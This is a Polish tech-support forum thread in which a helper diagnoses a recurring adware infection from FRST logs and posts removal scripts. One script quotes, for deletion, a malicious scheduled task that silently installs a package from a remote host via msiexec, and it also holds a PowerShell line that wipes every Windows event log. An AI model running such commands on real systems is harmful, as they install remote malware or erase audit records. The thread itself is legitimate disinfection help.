Witamy na forum PC Format Zapraszamy do REJESTRACJI


Użytkownicy przeglądający ten wątek: 1 gości

Wirus który wraca mimo że jest "usuwany"?

#1
Wirus który wraca mimo że jest "usuwany"?
Witam.
Ostatnio prześladuje mnie wirus, którego Avira oznacza jako typ: Adware.FileTour.(losowe znaki). Co jakąś godzine wywala mi na laptopie komunikat: Wystąpił problem podczas uruchamiania pliku MSE.Engine.dll. Zasoby systemowe nie wystarczają do ukończenia żądanej usługi. Avira ten plik automatycznie wrzuca do kwarantanny. Od czasu do czasu taki problem występuje w przypadku pliku IECache.dll. Za każdym razem gnieżdżą się w folderze C:\Users\Adrian\Favorites. Grzebałem po różnych wątkach na różnych forach i niestety, nic do tej pory mi nie pomogło. Pliki te od czasu do czasu ściągają mi trojany do tych folderów i mimo skanowania Avirą, Malwarebytesami różnymi, CCleanerami, JRT itd to problem cały czas u mnie jest i nie moge się pozbyć tego cholerstwa. Czy ktoś miał podobny problem i się go pozbył?
Proszę o pomoc,
Adrian
 System operacyjny: windows_ten Przeglądarka: chrome
#2
RE: Wirus który wraca mimo że jest "usuwany"?
czy nie prostsze byłoby pokazanie tu logów FRST?
 System operacyjny: windows_seven Przeglądarka: seamonkey
#3
RE: Wirus który wraca mimo że jest "usuwany"?
Oto i logi. Problem trwa dalej. Wirus jedynie przeniósł swój ulubiony folder do infekcji.


Załączone pliki
.txt   Shortcut.txt (Rozmiar: 38,15 KB / Pobrań: 21)
.txt   FRST.txt (Rozmiar: 29,35 KB / Pobrań: 28)
.txt   Addition.txt (Rozmiar: 83,84 KB / Pobrań: 25)
 System operacyjny: windows_ten Przeglądarka: chrome
#4
RE: Wirus który wraca mimo że jest "usuwany"?
Jest infekcja, która udaje, ze jest z ... Microsoftu!

Uruchom FRST. Na klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:

Kod:
Task: {28F6CD07-AC62-4CEC-A0DE-23DE4028C07C} - System32\Tasks\{915AB88F-C783-6F5D-0481-6CC2A6AEA8B6} => "msiexec.exe" -package hxxps://siamoderg.info/zrgavluieegl.fur /q
Task: {DB9FD05D-1009-4D51-B918-CF3DB108451C} - \CCleanerSkipUAC -> No File <==== ATTENTION
C:\Windows\SysWOW64\dJAfEOuWIK.exe
C:\Program Files (x86)\nTIOXKAzadQ.exe
C:\Users\Adrian\AppData\Local\imw.ini
FirewallRules: [{848D3680-843D-47EB-8978-8C9392ABE65A}] => (Allow) C:\Windows\SysWOW64\msiexec.exe
FirewallRules: [{0C941832-6B22-4B21-A2BF-E81551F0BCAA}] => (Allow) C:\Windows\SysWOW64\dJAfEOuWIK.exe
FirewallRules: [{002902D6-9D22-4A30-A58D-F2BCBEE02FF0}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{E0D51B22-1115-41B8-B7C4-F8AAEBD98420}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{E542AE5A-02B7-44BB-AE3E-1BDDF6EB21F1}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{8873B6E6-69A0-4B6E-AF91-E0C7AA085C91}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{64EE5AAA-8B0D-402B-9BEE-95C8C894E707}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{8301D19B-8E5E-4734-B8B3-D01AACD10F4C}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{B56162AA-CAC0-4C60-8A36-6A2547583714}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{4B6B624E-314E-490B-9666-DC0ECDF3CF31}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{57CF3AB9-391B-4EF9-9820-6D3B4D51AC8E}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{4F65BD88-2329-44DE-B561-009853B7EA9C}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{664BC0BE-BE6D-43C2-BABB-DD369918B5AB}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{22685FE3-CAC1-45C9-96DD-39F8F04CFC0F}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{EBA7F64E-336B-42EC-939F-8A8A69E6D826}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{8C771290-912A-4C6F-8DAC-4D1267F3089E}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{71C59722-D066-4714-8B31-130497F97A08}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{3EB5984B-899E-4383-BAD8-5C2A34FDBD90}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{C6DC8CF7-4AC3-4C79-8F80-D9B9D75AB688}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{33241446-4D35-4873-B3B8-8893BA35AB46}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{E6DBCC5C-8415-40A8-B959-CF66CD854929}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{A3A171C5-3CD8-4DA8-8121-99530E5871D8}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{6DC60A76-0CCF-482D-BF30-565136E217FE}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{9AF71AD2-D5C2-4CC2-B626-B36C4D6860FA}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{95830E8E-FC1E-49D9-8FBB-1BF01F728883}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{A902A3EE-91A3-4629-9C2A-ACE1E8DE3607}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{78EDE701-CFFD-4BFD-BBF8-D0A83697BD30}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{16415F38-A446-4198-9C82-ADF014FE69DE}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{0636E569-F191-450B-9CAA-997E8D40DFDD}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{3FD149B3-0643-47DA-9C2C-B7B7182B6BAE}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{AEDA38EB-17BD-435F-A090-A6A9C97C0B14}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{310633AE-9A30-4D23-ACE2-FBCF475B61D3}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{1E92FDAD-65D8-4898-A5F7-D5CACA06EC62}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
CHR Extension: (MyJSCript) - C:\Users\Adrian\AppData\Local\Google\Chrome\User Data\Default\Extensions\gpabpfikknflecblchhfkpkcpilbkfcd [2018-11-12]
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
EmptyTemp:
Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW).

Zrób nowe logi FRST.


Cytat:Za każdym razem gnieżdżą się w folderze C:\Users\Adrian\Favorites.
W logu Shortcut nie widzę niczego podejrzanego "Ulubionych" stronach (czyli w Favorites).
.
 System operacyjny: windows_seven Przeglądarka: seamonkey
#5
RE: Wirus który wraca mimo że jest "usuwany"?
Oto nowe logi. Zapewne nic tym razem w folderze Ulubionych nie pokazało, gdyż dnia dzisiejszego go czyściłem ręcznie. 


Załączone pliki
.txt   Addition.txt (Rozmiar: 69,39 KB / Pobrań: 28)
.txt   FRST.txt (Rozmiar: 37,34 KB / Pobrań: 26)
.txt   Shortcut.txt (Rozmiar: 38,15 KB / Pobrań: 22)
 System operacyjny: windows_ten Przeglądarka: chrome
#6
RE: Wirus który wraca mimo że jest "usuwany"?
Tylko kosmetyka:
Uruchom FRST. Na klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:

Kod:
HKLM\...\Run: [] => [X]
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-67037204-977343973-1662228792-1001\...\Run: [] => [X]
GroupPolicy: Restriction ? <==== ATTENTION
CHR Extension: (MyJSCript) - C:\Users\Adrian\AppData\Local\Google\Chrome\User Data\Default\Extensions\gpabpfikknflecblchhfkpkcpilbkfcd [2018-11-12]
EmptyTemp:
Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW).
.
Powinno już być OK.
.
 System operacyjny: windows_seven Przeglądarka: seamonkey
#7
RE: Wirus który wraca mimo że jest "usuwany"?
Zrobiłem wszystko zgodnie z instrukcją. Od około 3 dni nie zauważyłem, by Avira alarmowała o wirusie...aż do dziś. Avira uznała, że FRST nosi w sobie trojana i wrzuciła FRST do kwarantanny. Przeczulenie antywirusa czy coś może być na rzeczy?
 System operacyjny: windows_ten Przeglądarka: chrome
#8
RE: Wirus który wraca mimo że jest "usuwany"?
to "przeczulenie".
 System operacyjny: windows_seven Przeglądarka: seamonkey
Programy: Polecane / Nowe / Inne




Podobne wątki (Wirus który wraca mimo że jest "usuwany"?)
Wątek: Autor Odpowiedzi: Wyświetleń: Ostatni post
  Wirus który nie chce sie usunąć elderek 1 1106 04.03.2017, 02:05
Ostatni post: broda99
  Mimo iż komputer działa normalnie wszycy odbiorcy maili mowią, że mam wirusa. niekumaty 1 3016 02.01.2016, 23:28
Ostatni post: morderca
  [Dysk twardy, pendrive]Wirus, który zamienia pliki na skróty. Polityk20122 9 4911 19.08.2014, 16:26
Ostatni post: Polityk20122

Skocz do:


Wybrane wątki (Wirus który wraca mimo że jest "usuwany"?)
Wątek: Autor Odpowiedzi: Wyświetleń: Ostatni post
  Podejrzane procesy: avguirna.exe, igfxTray, hppusg, program [wydzielone] moplefan 2 5144 06.03.2018 20:58
Ostatni post: moplefan
  Spowolnienie komputera PaTrYkus44 9 5736 24.02.2018 01:16
Ostatni post: PaTrYkus44
  gameorplay.info jak to usunąć? kingaa 1 1261 23.02.2018 20:40
Ostatni post: morderca
  Randomowe restartowanie systemu win 10 WiecznieCoś 1 4937 22.02.2018 04:41
Ostatni post: Illidan
  Włączające się cmd (wiersz poleceń) v33N 3 5065 17.02.2018 19:43
Ostatni post: broda99
  Poważne infekcje komputer przestaje współpracować PowerShel WinRM i Zdalny Pulpit egon89 49 23898 17.02.2018 17:03
Ostatni post: kamel16
  Samoistne otwieranie niechcianych stron RadekKw 2 4781 15.02.2018 16:44
Ostatni post: RadekKw
  Złośliwy załącznik w mailu - makra tictac 1 4790 14.02.2018 19:14
Ostatni post: broda99
  Informacja o zablokowaniu komputera MMilka 2 4751 08.02.2018 21:27
Ostatni post: MMilka
  Ile antywirusów? greg8403 2 4887 06.02.2018 16:38
Ostatni post: Michu_PL
  Czy programy do hakowania facebooka działają? Majki_77 2 6437 06.02.2018 16:35
Ostatni post: Michu_PL
  Łamanie hasła wifi Globart 2 4691 06.02.2018 16:33
Ostatni post: Michu_PL
  Chrome przekierowuje na Yahoo wool14 0 4590 31.01.2018 00:00
Ostatni post: wool14
  System nie wyłącza się po kliknięciu "zamknij" niceassshe 3 5043 28.01.2018 20:56
Ostatni post: broda99
  Proces bez nazwy zużywa dużo pamięci Xayliii 1 5206 28.01.2018 08:13
Ostatni post: broda99